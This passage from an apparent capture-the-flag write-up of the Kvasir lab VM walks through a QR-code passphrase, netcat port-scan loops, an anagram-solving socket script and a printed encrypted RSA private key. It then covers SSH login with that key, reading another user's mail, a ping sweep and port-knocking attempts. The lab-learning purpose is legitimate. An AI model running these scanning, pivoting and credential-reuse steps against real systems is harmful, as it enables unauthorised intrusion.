</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/data/scripts/stepic-0.3# echo "89504e470d0a1a0a0000000d494844520000012200000122010300000067704df500000006504c5445ffffff00000055c2d37e00000104494441540899ed98c90dc32010459152804b72eb2ec9054422304bc089655f180ec9fb0730f07cfa9a0552420821f43fcaa6674aeb5e96dbe23b1b5434a58be559bf1e59befa03a848aa5ab22de690f2d530a8895473086a365500e7a1265132b5b3bbfc05358e7a57640b919bba0d358eeab55c9c418da7cc0df1a576a2792fa561ad035434a5920b808588d974e215d4584acff4065626ffe9db47a8e194eec805a00d7621830aa6acffd40c95d5a6fa27d404cae555e13475410550e6cca113ed72145424a56ee8ab4f8989ecb5196a02d5bdfa2477e83333410553d97ba093cc04154c89a439ba880ea881944c2d3aea0a6a0e75acc8528c4550e1144208a15fd70b88df9bb4ae0a3dc20000000049454e44ae426082" | xxd -p -r &gt; out
</span><span class='line'>root@kali:~/data/scripts/stepic-0.3# file out 
</span><span class='line'>out: PNG image data, 290 x 290, 1-bit colormap, non-interlaced</span></code></pre></td></tr></table></div></figure>


<p>Another image file! It&rsquo;s actually a QR code.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/qr.png" title="QR" alt="QR" /></p>

<p>I passed it on to <a href="http://www.onlinebarcodereader.com/">Online Barcode Reader</a> and got the following text <code>Nk9yY31hva8q</code>. Not sure what it&rsquo;s for, may be some kind of password, let&rsquo;s hold on to it for now.</p>

<h2>Solving anagrams</h2>

<p>Having poked around a bit more on <code>celes</code>, I couldn&rsquo;t find anything interesting and it wasn&rsquo;t dual homed. One thing we haven&rsquo;t looked at yet is the other server - <code>terra</code> (192.168.3.50).</p>

<p>Since we&rsquo;re looking at 192.168.3.0 subnet, that means that we would need to double-pivot from our Kali to do a port scan. While I tried that with metasploit, it was failing pretty badly (meterpreters kept crashing). We could put nmap on db server, but meh, I&rsquo;ve crafted my own, very simple portscanner.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# for i in {1..65535}; do nc -z 192.168.3.50 $i; if [ $? -eq 0 ]; then echo "Port $i listening" &gt;&gt; results; fi; done
</span><span class='line'>root@db:~# cat results 
</span><span class='line'>Port 4444 listening</span></code></pre></td></tr></table></div></figure>


<p>Awesome, let&rsquo;s see what it is.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# nc 192.168.3.50 4444
</span><span class='line'>Hello Celes & Welcome to the Jumble!
</span><span class='line'>
</span><span class='line'>Solve:ogsdioclpe 
</span><span class='line'>Solve:oagichrlogp 
</span><span class='line'>Solve:snelrgiermo ^C</span></code></pre></td></tr></table></div></figure>


<p>Solving jumbles&hellip; great. I tried couple typical buffer overflow things etc., but none of them worked. I guess we&rsquo;ll need to script up anagram solver.</p>

<p>Also, which dictionary should we use&hellip; after a bit of playing around with that jumble it seemed like there were couple known usernames from #vulnhub. And remember that words.txt file we looted earlier on? It was exactly it! Let&rsquo;s us that and code it all up.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="kn">import</span> <span class="nn">socket</span>
</span><span class='line'>
</span><span class='line'><span class="c"># dictionary</span>
</span><span class='line'><span class="n">wordlist</span><span class="o">=</span><span class="nb">open</span><span class="p">(</span><span class="s">&quot;words.txt&quot;</span><span class="p">,</span><span class="s">&quot;r&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Open socket and retrieve welcome message</span>
</span><span class='line'><span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span><span class='line'><span class="n">sock</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s">&quot;192.168.3.50&quot;</span><span class="p">,</span> <span class="mi">4444</span><span class="p">))</span>
</span><span class='line'><span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">38</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Keep getting data until socket closes</span>
</span><span class='line'><span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
</span><span class='line'>    <span class="c"># Read data from the server</span>
</span><span class='line'>    <span class="n">data</span> <span class="o">=</span> <span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">5120</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'>    <span class="c"># Get the word to decode and strip out spaces and new line</span>
</span><span class='line'>    <span class="n">phrase</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">6</span><span class="p">:]</span><span class="o">.</span><span class="n">rstrip</span><span class="p">()</span>
</span><span class='line'>    <span class="k">print</span> <span class="s">&quot;Phrase = &quot;</span> <span class="o">+</span> <span class="n">phrase</span>
</span><span class='line'>
</span><span class='line'>    <span class="c"># Rewind the file back to start</span>
</span><span class='line'>    <span class="n">wordlist</span><span class="o">.</span><span class="n">seek</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span><span class='line'>
</span><span class='line'>    <span class="c"># Go through each line in the wordlist and try to find a match</span>
</span><span class='line'>    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">wordlist</span><span class="p">:</span>
</span><span class='line'>        <span class="n">found_match</span> <span class="o">=</span> <span class="bp">True</span>
</span><span class='line'>        <span class="n">answer</span> <span class="o">=</span> <span class="s">&quot;n/a&quot;</span>
</span><span class='line'>
</span><span class='line'>        <span class="c"># Remove whitespaces and new lines from dictionary word</span>
</span><span class='line'>        <span class="n">word</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">rstrip</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'>        <span class="c"># Start investigating phrase only if it has the same length as selected word from dictionary</span>
</span><span class='line'>        <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">phrase</span><span class="p">)</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">word</span><span class="p">):</span>
</span><span class='line'>            <span class="c"># Go through every letter in the phrase and check number of its occurrences against dictionary word,</span>
</span><span class='line'>            <span class="c"># if it matches number of occurences of the letter in the phrase, move on to the next letter.</span>
</span><span class='line'>            <span class="c"># As soon as it fails, don&#39;t bother investigating the word further</span>
</span><span class='line'>            <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">phrase</span><span class="p">)):</span>
</span><span class='line'>                <span class="k">if</span> <span class="n">phrase</span><span class="o">.</span><span class="n">count</span><span class="p">(</span><span class="n">phrase</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">!=</span> <span class="n">word</span><span class="o">.</span><span class="n">count</span><span class="p">(</span><span class="n">phrase</span><span class="p">[</span><span class="n">i</span><span class="p">]):</span>
</span><span class='line'>                    <span class="n">found_match</span> <span class="o">=</span> <span class="bp">False</span>
</span><span class='line'>                    <span class="k">break</span><span class="p">;</span>
</span><span class='line'>            <span class="k">if</span> <span class="n">found_match</span><span class="p">:</span>
</span><span class='line'>                <span class="n">answer</span> <span class="o">=</span> <span class="n">word</span><span class="p">;</span>
</span><span class='line'>                <span class="k">break</span><span class="p">;</span>
</span><span class='line'>
</span><span class='line'>    <span class="k">print</span> <span class="s">&quot;Answer = &quot;</span> <span class="o">+</span> <span class="n">answer</span>
</span><span class='line'>
</span><span class='line'>    <span class="c"># Send answer to the server</span>
</span><span class='line'>    <span class="n">sock</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">answer</span><span class="p">);</span>
</span></code></pre></td></tr></table></div></figure>


<p>It&rsquo;s actually really quick to run and we get another element in the puzzle.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# ./anagram-socket.py 
</span><span class='line'>Phrase = itaingdhs
</span><span class='line'>Answer = gandhiist
</span><span class='line'>Phrase = aifieinvuacqotolr
</span><span class='line'>Answer = overqualification
</span><span class='line'>Phrase = gorypcueshsry
</span><span class='line'>Answer = psychosurgery
</span><span class='line'>
</span><span class='line'>(...truncated...)
</span><span class='line'>
</span><span class='line'>Phrase = iidvaeart
</span><span class='line'>Answer = radiative
</span><span class='line'>Phrase = bloiblhimpisi
</span><span class='line'>Answer = bibliophilism
</span><span class='line'>Phrase = hvnaci
</span><span class='line'>Answer = chavin
</span><span class='line'>Phrase = rabbsrae
</span><span class='line'>Answer = barrebas
</span><span class='line'>Phrase = : 120
</span><span class='line'>Time: 0.02 secs
</span><span class='line'>You're a winner
</span><span class='line'>LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRFSy1JbmZvOiBBRVMtMTI4LUNCQyw3Njg0MTgyMkFCOUU3NzJGRDFENjUzRjYxNzlGMEU0RAoKT3JFTTJvY25oSEtnNW51SDdwczFDb09KQ2loYXNtRkpLTE9WTk5ZRk9oR0tVb2pQWUV0YTV5T2hJc2tmMGgwcgpTbyt4VkRLNjdHM0RsZ3ltVVYzRHhHZml6TGZadmh4UVJDOFF5MG1mNE4rbWlZa3ZmMk5hRnRhdHBOY2pLNXBNClV5NlFTRk1PQzhhS3BlMEZMNlVHRFJKUTVHU0c0RGxKckxVSkJNdm5TTHRZWkhsYVdBSUNLYlhmcFhWNFNUd3YKSjBEOGg5UnRsUkpoTENLNWVLZ3VwWUNRSWlHUVdnM1B2WnBYazlra2pYaG1PUXdVWW9DUmwzbDRqNXpsbkZjVApQNlU5VVBoUnEvQ2s0UXJrMmRHeEZmcHBRZDl4VytiNFBXamlTQ2lrTEYzUTBoZk5OdkVidTRvdW5BZ1l3UEZICmpPWEhKcXhWb2cvcFp6OVk4WGZTUDNoejlBWUhXZkkyaUM5Q25rN2JvUmNPdittY2dFZVdXa1lyVnNjT2l2WWoKOU4yeGlOcDRHSCtOSUc4bW0vTGRsN2pRTWwvVnJyNWN4M2ZYak9lem1nc1NrQVk0Q2NzcHdLc1NYSzhHTC9iTwpoVDZwS1dmTDZVSTh3VWdwSTdLaGdLK0FPS3VTL1hQWVRTZHorMFJKeE5GU0xPRk5jalJ0TCtOVzBValBxNUpoCkRpYStwdzVxQitsbGx4Z2FOMFdCUXNrSUZRcHBwUG93d2pHOEpnOGpKQmpTWWozcjRMSXJad0pTcGN2b0JpVUEKb0NxblFVTXRYbE1oOS9DdkJCR3MxK0pWY2prSW5CZGU5NDVWK2VqaFA2R1BZanU0VFFWN0I3MGQ3YUVXME9FbQowZDduck9XL0xDWXBzVi9ONXJxVnNHbFR2d2pKTm93eU1xRVo5RTA5Z3VNNWVMNENFUFBtcDlaRGV5MmZCQUd3CnE3blNyOHE2SHNmNGQrWVBSKzkwRWZNSlJlcUkzczFGUW9UdngrUGFGUGlLdzdkZkhGQ2dMc2NYY1hjb2duTHoKY0IwbG5lbUkrY0ZtZlk3NEYxZVlMM2Z3Skl3U1JnSzg1WGMyTXk4c3FKejFpemo2SWxPMmtRMWpMa3JoSk9aOApYK3AvOXc1ekEweDJmYmpwcEhhYytZb0pmeVB5WVhqa3BpZ0RQakhYaFJpdDJxblVySGZEYzBGamg1QUtOVTJLCk1VL3l3WEdFZzZ3MENwcEs5SkJvMHUveEpsaFQvak9XTmlNNFlaalhsaFF6a3h5ZWJ2YnlSUzZTbGhsbzE0MmwKZ011TVV2UG4xZkFlbmlyNkFGd3kycmxrdFE1L2E4ejJWQ3dQa05BNDBNSW1TSE1XUlNGYm9Eak01endyMjRHawpOMHBJMUJDbUNzZjBtc3ZFd0xoZGNWbmhKWTdCZzRpem01YlgrQXJWL3ltTE9reWJLOGNoejVmcnlYY2plVjFxCml6SmUyQVhaazEvOGhZODB0dkpXanhVRWZuZ3V5b296UWY1VDc0bW41YWV6OUpnR1dNcXpwZkt3WjZMeDVjVGcKWnUrbStyeWFrQlBGalV0dDA0bENZQ0NLV1F6UGhnSXI1eFVGeDYyaENHaGg2Vzh0U0lCNms3SHB1bjEyM0dRMAp1VCtSMEVyWUE1R2R5eDQ0RlpFYXRaM3JYQ3BWbUpsbENUV1VxQnVhSFlBdGNaVGhUVFpmeFJGSHkwMklUNkZXClBMQ1ovWE4yRStUZHRrWG1GY1RYUnNndHlBLzVWWHNUV1dtUmNIY3p2NWc1WWNRM3BIczNNaFN4c1dTZFR6LzgKUll6bXhPbkNqWldYYVVlMFhiN0ZqQS9ldm1wWHN5aENoR2J2cDBLMGhaRmNNZXN6RkthOEs0cEFlZGN5RzMxbgo0K0hoSW1uRXBMWlFPWGhmWGxrS01RWHJCeXM3aGtvbmtEcDU3VnFoK0lJWkxHelZtZlRWRWoyV2hjLzBZK0dJCkRNcGgwWnZURytKZ3YxTE8zU2w4MlJ6bTFqVWt6RUlaTkl4WWVTR3JaZjZDaFZMUGE4NWF4cXc1RVZOQ3hZVWcKSkFxZyt1ZDZ4SU85b2JpZHh6STJyTGZieGNwTXVyODBuYjRjcllNTm0wOXlQUWFza25nSy80SWptblBMZVRpaAotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=</span></code></pre></td></tr></table></div></figure>


<p>When we <code>base64 -d</code> the output, we get the following RSA key.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>-----BEGIN RSA PRIVATE KEY-----
</span><span class='line'>Proc-Type: 4,ENCRYPTED
</span><span class='line'>DEK-Info: AES-128-CBC,76841822AB9E772FD1D653F6179F0E4D
</span><span class='line'>
</span><span class='line'>OrEM2ocnhHKg5nuH7ps1CoOJCihasmFJKLOVNNYFOhGKUojPYEta5yOhIskf0h0r
</span><span class='line'>So+xVDK67G3DlgymUV3DxGfizLfZvhxQRC8Qy0mf4N+miYkvf2NaFtatpNcjK5pM
</span><span class='line'>Uy6QSFMOC8aKpe0FL6UGDRJQ5GSG4DlJrLUJBMvnSLtYZHlaWAICKbXfpXV4STwv
</span><span class='line'>J0D8h9RtlRJhLCK5eKgupYCQIiGQWg3PvZpXk9kkjXhmOQwUYoCRl3l4j5zlnFcT
</span><span class='line'>P6U9UPhRq/Ck4Qrk2dGxFfppQd9xW+b4PWjiSCikLF3Q0hfNNvEbu4ounAgYwPFH
</span><span class='line'>jOXHJqxVog/pZz9Y8XfSP3hz9AYHWfI2iC9Cnk7boRcOv+mcgEeWWkYrVscOivYj
</span><span class='line'>9N2xiNp4GH+NIG8mm/Ldl7jQMl/Vrr5cx3fXjOezmgsSkAY4CcspwKsSXK8GL/bO
</span><span class='line'>hT6pKWfL6UI8wUgpI7KhgK+AOKuS/XPYTSdz+0RJxNFSLOFNcjRtL+NW0UjPq5Jh
</span><span class='line'>Dia+pw5qB+lllxgaN0WBQskIFQpppPowwjG8Jg8jJBjSYj3r4LIrZwJSpcvoBiUA
</span><span class='line'>oCqnQUMtXlMh9/CvBBGs1+JVcjkInBde945V+ejhP6GPYju4TQV7B70d7aEW0OEm
</span><span class='line'>0d7nrOW/LCYpsV/N5rqVsGlTvwjJNowyMqEZ9E09guM5eL4CEPPmp9ZDey2fBAGw
</span><span class='line'>q7nSr8q6Hsf4d+YPR+90EfMJReqI3s1FQoTvx+PaFPiKw7dfHFCgLscXcXcognLz
</span><span class='line'>cB0lnemI+cFmfY74F1eYL3fwJIwSRgK85Xc2My8sqJz1izj6IlO2kQ1jLkrhJOZ8
</span><span class='line'>X+p/9w5zA0x2fbjppHac+YoJfyPyYXjkpigDPjHXhRit2qnUrHfDc0Fjh5AKNU2K
</span><span class='line'>MU/ywXGEg6w0CppK9JBo0u/xJlhT/jOWNiM4YZjXlhQzkxyebvbyRS6Slhlo142l
</span><span class='line'>gMuMUvPn1fAenir6AFwy2rlktQ5/a8z2VCwPkNA40MImSHMWRSFboDjM5zwr24Gk
</span><span class='line'>N0pI1BCmCsf0msvEwLhdcVnhJY7Bg4izm5bX+ArV/ymLOkybK8chz5fryXcjeV1q
</span><span class='line'>izJe2AXZk1/8hY80tvJWjxUEfnguyoozQf5T74mn5aez9JgGWMqzpfKwZ6Lx5cTg
</span><span class='line'>Zu+m+ryakBPFjUtt04lCYCCKWQzPhgIr5xUFx62hCGhh6W8tSIB6k7Hpun123GQ0
</span><span class='line'>uT+R0ErYA5Gdyx44FZEatZ3rXCpVmJllCTWUqBuaHYAtcZThTTZfxRFHy02IT6FW
</span><span class='line'>PLCZ/XN2E+TdtkXmFcTXRsgtyA/5VXsTWWmRcHczv5g5YcQ3pHs3MhSxsWSdTz/8
</span><span class='line'>RYzmxOnCjZWXaUe0Xb7FjA/evmpXsyhChGbvp0K0hZFcMeszFKa8K4pAedcyG31n
</span><span class='line'>4+HhImnEpLZQOXhfXlkKMQXrBys7hkonkDp57Vqh+IIZLGzVmfTVEj2Whc/0Y+GI
</span><span class='line'>DMph0ZvTG+Jgv1LO3Sl82Rzm1jUkzEIZNIxYeSGrZf6ChVLPa85axqw5EVNCxYUg
</span><span class='line'>JAqg+ud6xIO9obidxzI2rLfbxcpMur80nb4crYMNm09yPQaskngK/4IjmnPLeTih
</span><span class='line'>-----END RSA PRIVATE KEY-----</span></code></pre></td></tr></table></div></figure>


<p>Awesome, let&rsquo;s use this to connect in as <code>terra</code>.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# ssh terra@192.168.3.50 -i terra.id
</span><span class='line'>Enter passphrase for key 'terra.id':</span></code></pre></td></tr></table></div></figure>


<p>Passphrase? Let&rsquo;s try <code>Nk9yY31hva8q</code> from the QR code.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@db:~# ssh terra@192.168.3.50 -i terra.id
</span><span class='line'>Enter passphrase for key 'terra.id': 
</span><span class='line'>Linux dev2 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64
</span><span class='line'>
</span><span class='line'>The programs included with the Debian GNU/Linux system are free software;
</span><span class='line'>the exact distribution terms for each program are described in the
</span><span class='line'>individual files in /usr/share/doc/*/copyright.
</span><span class='line'>
</span><span class='line'>Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
</span><span class='line'>permitted by applicable law.
</span><span class='line'>You have mail.
</span><span class='line'>Last login: Tue Nov  4 17:51:12 2014 from 192.168.3.200
</span><span class='line'>terra@dev2:~$</span></code></pre></td></tr></table></div></figure>


<p>Aaaand we&rsquo;re in!</p>

<h2>Port knocking </h2>

<p>First thing you notice, there&rsquo;s some mail to read. Let&rsquo;s disregard privacy and see what&rsquo;s in there.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>terra@dev2:~$ cat /var/mail/terra 
</span><span class='line'>Return-path: &lt;locke@192.168.4.100&gt;
</span><span class='line'>Received: from locke by 192.168.4.100 with local (Exim 4.80)
</span><span class='line'>~       (envelope-from &lt;locke@adm&gt;)
</span><span class='line'>~       id 1XHczw-0000V2-8y
</span><span class='line'>~       for terra@192.168.3.50; Wed, 13 Aug 2014 19:10:08 +0100
</span><span class='line'>
</span><span class='line'>Date: Wed, 13 Aug 2014 19:10:08 +0100
</span><span class='line'>To: terra@192.168.3.50
</span><span class='line'>Subject: Port Knock
</span><span class='line'>User-Agent: Heirloom mailx 12.5 6/20/10
</span><span class='line'>MIME-Version: 1.0
</span><span class='line'>Content-Type: text/plain; charset=us-ascii
</span><span class='line'>Content-Transfer-Encoding: 7bit
</span><span class='line'>Message-Id: &lt;E1XHczw-0000V2-8y@adm&gt;
</span><span class='line'>From: locke@192.168.4.100
</span><span class='line'>~
</span><span class='line'>Hi Terra,
</span><span class='line'>
</span><span class='line'>I've been playing with a port knocking daemon on my PC - see if you can use that to get a shell.
</span><span class='line'>Let me know how it goes.
</span><span class='line'>
</span><span class='line'>Regards,
</span><span class='line'>Locke</span></code></pre></td></tr></table></div></figure>


<p>Okay, looks like port knocking is enabled on <code>locke</code>. But, what&rsquo;s the sequence, what&rsquo;s <code>locke</code>&rsquo;s IP address and what other ports are open?</p>

<p>We can see that <code>terra</code> is dual-homed, so most likely, <code>locke</code> is going to be in 192.168.4.0 subnet.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>terra@dev2:~$ /sbin/ifconfig
</span><span class='line'>eth0      Link encap:Ethernet  HWaddr 16:90:14:17:19:17  
</span><span class='line'>          inet addr:192.168.3.50  Bcast:192.168.3.255  Mask:255.255.255.0
</span><span class='line'>          inet6 addr: fe80::1490:14ff:fe17:1917/64 Scope:Link
</span><span class='line'>          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
</span><span class='line'>          RX packets:149577 errors:0 dropped:0 overruns:0 frame:0
</span><span class='line'>          TX packets:162327 errors:0 dropped:0 overruns:0 carrier:0
</span><span class='line'>          collisions:0 txqueuelen:1000 
</span><span class='line'>          RX bytes:11573196 (11.0 MiB)  TX bytes:17903327 (17.0 MiB)
</span><span class='line'>
</span><span class='line'>eth1      Link encap:Ethernet  HWaddr da:9e:bf:d1:a2:e6  
</span><span class='line'>          inet addr:192.168.4.50  Bcast:192.168.4.255  Mask:255.255.255.0
</span><span class='line'>          inet6 addr: fe80::d89e:bfff:fed1:a2e6/64 Scope:Link
</span><span class='line'>          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
</span><span class='line'>          RX packets:126211 errors:0 dropped:0 overruns:0 frame:0
</span><span class='line'>          TX packets:97379 errors:0 dropped:0 overruns:0 carrier:0
</span><span class='line'>          collisions:0 txqueuelen:1000 
</span><span class='line'>          RX bytes:18689553 (17.8 MiB)  TX bytes:7391653 (7.0 MiB)
</span><span class='line'>
</span><span class='line'>(...)</span></code></pre></td></tr></table></div></figure>


<p>First, let&rsquo;s use my homemade scanner to see what IP addresses are in the range.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>terra@dev2:~$ for i in {1..254}; do ping -c 1 -w 1 192.168.4.$i | grep "1 received" -B 1; done
</span><span class='line'>^C
</span><span class='line'>--- 192.168.4.50 ping statistics ---
</span><span class='line'>1 packets transmitted, 1 received, 0% packet loss, time 0ms
</span><span class='line'>--- 192.168.4.100 ping statistics ---
</span><span class='line'>1 packets transmitted, 1 received, 0% packet loss, time 0ms
</span><span class='line'>^C</span></code></pre></td></tr></table></div></figure>


<p>Looks like 192.168.4.100 is the one we should be interested in. Let&rsquo;s see what ports are opened.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>terra@dev2:~$ for i in {1..65535}; do nc -z 192.168.4.100 $i; if [ $? -eq 0 ]; then echo "Port $i listening" &gt;&gt; results; fi; done
</span><span class='line'>terra@dev2:~$ cat results 
</span><span class='line'>Port 22 listening</span></code></pre></td></tr></table></div></figure>


<p>Okay&hellip; port 22 opened, but we don&rsquo;t have a password/key&hellip; maybe port knocking will open more ports? But what&rsquo;s the sequence? Let&rsquo;s try some defaults - maybe 7000, 8000, 9000 (<a href="http://www.zeroflux.org/projects/knock/">knockd</a> defaults).</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>terra@dev2:~$ nc 192.168.4.100 7000
</span><span class='line'>(UNKNOWN) [192.168.4.100] 7000 (afs3-fileserver) : Connection refused
</span><span class='line'>terra@dev2:~$ nc 192.168.4.100 8000
</span><span class='line'>(UNKNOWN) [192.168.4.100] 8000 (?) : Connection refused
</span><span class='line'>terra@dev2:~$ nc 192.168.4.100 9000
</span><span class='line'>(UNKNOWN) [192.168.4.100] 9000 (?) : Connection refused
